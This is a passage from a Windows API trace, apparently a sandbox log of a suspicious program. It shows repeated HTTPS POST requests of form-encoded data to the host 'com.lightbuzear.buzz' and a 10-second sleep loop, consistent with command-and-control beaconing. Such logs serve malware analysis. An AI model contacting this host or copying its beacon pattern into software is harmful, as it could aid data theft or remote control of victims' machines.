hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0187.268] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d18 | out: hHeap=0x4780000) returned 1 [0187.269] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0187.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0187.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0187.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0187.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0187.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0187.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5c0 [0187.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0187.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce680 [0187.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0187.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa00 [0187.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0187.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f868 [0187.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa00 | out: hHeap=0x4780000) returned 1 [0187.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0187.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f868 | out: hHeap=0x4780000) returned 1 [0187.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47a0d18 [0187.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0187.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0187.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d18 | out: hHeap=0x4780000) returned 1 [0187.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0d18 [0187.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 [0187.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48151d0 [0187.270] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0187.270] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0187.270] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0187.270] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0187.271] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48151d0 | out: hHeap=0x4780000) returned 1 [0187.271] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0187.271] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0187.271] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0187.271] FreeLibrary (hLibModule=0x71570000) returned 1 [0187.271] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0187.271] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0187.271] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f150 | out: hHeap=0x4780000) returned 1 [0187.272] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f380 | out: hHeap=0x4780000) returned 1 [0187.272] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f5b0 | out: hHeap=0x4780000) returned 1 [0187.272] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9f00 | out: hHeap=0x4780000) returned 1 [0187.272] Sleep (dwMilliseconds=0x2710) [0187.296] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0187.296] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0187.296] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0187.296] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6f0 [0187.296] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0187.296] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6b0 [0187.296] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0187.296] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0187.296] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0187.296] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f970 [0187.296] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0187.296] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fa60 [0187.296] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f970 | out: hHeap=0x4780000) returned 1 [0187.296] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0187.296] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa60 | out: hHeap=0x4780000) returned 1 [0187.296] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481f8e0 [0187.305] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f5b0 [0187.305] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f5b0 | out: hHeap=0x4780000) returned 1 [0187.305] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0187.305] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f5b0 [0187.305] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0187.305] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0187.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0187.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0187.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0187.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0187.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0187.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0187.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0187.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0187.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f808 [0187.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0187.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fac0 [0187.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f808 | out: hHeap=0x4780000) returned 1 [0187.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0187.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fac0 | out: hHeap=0x4780000) returned 1 [0187.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f380 [0187.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0187.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb908 [0187.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f380 | out: hHeap=0x4780000) returned 1 [0187.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f150 [0187.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0187.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f380 [0187.307] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0187.307] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0187.471] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0187.533] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0187.533] FreeLibrary (hLibModule=0x71780000) returned 1 [0187.534] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f380 | out: hHeap=0x4780000) returned 1 [0187.534] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0187.534] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f380 [0187.534] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0187.534] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6c0 [0187.534] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0187.534] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0187.534] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5f0 [0187.534] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0187.534] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0187.534] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0187.534] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0187.534] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0187.534] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f910 [0187.534] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0187.534] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f880 [0187.535] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f910 | out: hHeap=0x4780000) returned 1 [0187.535] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0187.535] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f880 | out: hHeap=0x4780000) returned 1 [0187.535] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481f7f0 [0187.535] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9f00 [0187.535] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9f00 | out: hHeap=0x4780000) returned 1 [0187.535] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0187.535] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9f00 [0187.535] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0187.536] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814e88 [0187.536] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce640 [0187.536] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6b0 [0187.536] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0187.536] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0187.536] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0187.536] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0187.536] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0187.536] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0187.536] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0187.536] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa00 [0187.536] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0187.536] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fa60 [0187.536] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa00 | out: hHeap=0x4780000) returned 1 [0187.536] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0187.536] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa60 | out: hHeap=0x4780000) returned 1 [0187.536] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481f8f8 [0187.536] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814f50 [0187.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814f50 | out: hHeap=0x4780000) returned 1 [0187.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0187.537] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0187.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0187.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0187.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0187.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0187.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0187.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0187.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0187.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0187.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0187.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f820 [0187.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0187.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f9d0 [0187.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f820 | out: hHeap=0x4780000) returned 1 [0187.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0187.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f9d0 | out: hHeap=0x4780000) returned 1 [0187.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4814f78 [0187.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0187.538] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0187.538] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814f78 | out: hHeap=0x4780000) returned 1 [0187.538] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815090 [0187.538] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0187.538] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48151d0 [0187.538] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0187.538] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0187.538] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0187.538] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0187.539] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48151d0 | out: hHeap=0x4780000) returned 1 [0187.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5f0 [0187.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0187.539] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0187.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0187.539] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0187.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0187.539] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0187.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0187.539] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0187.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f838 [0187.539] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0187.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f850 [0187.539] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f838 | out: hHeap=0x4780000) returned 1 [0187.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0187.539] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f850 | out: hHeap=0x4780000) returned 1 [0187.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4814d70 [0187.539] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0187.540] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd30 [0187.540] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814d70 | out: hHeap=0x4780000) returned 1 [0187.540] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814fc8 [0187.540] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 [0187.540] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814f00 [0187.540] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0187.541] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0187.541] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0187.541] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0189.919] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814f00 | out: hHeap=0x4780000) returned 1 [0189.919] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0189.919] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0189.920] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0189.920] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0189.920] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0189.920] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0189.920] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0189.920] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0189.920] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0189.920] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0189.920] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0189.920] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0189.920] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f940 [0189.920] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0189.920] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fac0 [0189.921] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f940 | out: hHeap=0x4780000) returned 1 [0189.921] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0189.921] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fac0 | out: hHeap=0x4780000) returned 1 [0189.921] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4814ed8 [0189.921] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0189.921] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0189.921] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814ed8 | out: hHeap=0x4780000) returned 1 [0189.921] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814d98 [0189.921] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0189.921] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48151d0 [0189.921] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0189.922] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0189.922] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0189.922] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0189.922] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48151d0 | out: hHeap=0x4780000) returned 1 [0189.923] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0189.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0189.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0189.923] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0189.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0189.923] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0189.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0189.923] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0189.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce640 [0189.923] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0189.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa48 [0189.923] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0189.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f838 [0189.923] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa48 | out: hHeap=0x4780000) returned 1 [0189.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0189.923] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f838 | out: hHeap=0x4780000) returned 1 [0189.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4814d20 [0189.923] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0189.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0189.923] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814d20 | out: hHeap=0x4780000) returned 1 [0189.924] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814dc0 [0189.924] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0189.924] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814cf8 [0189.924] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, 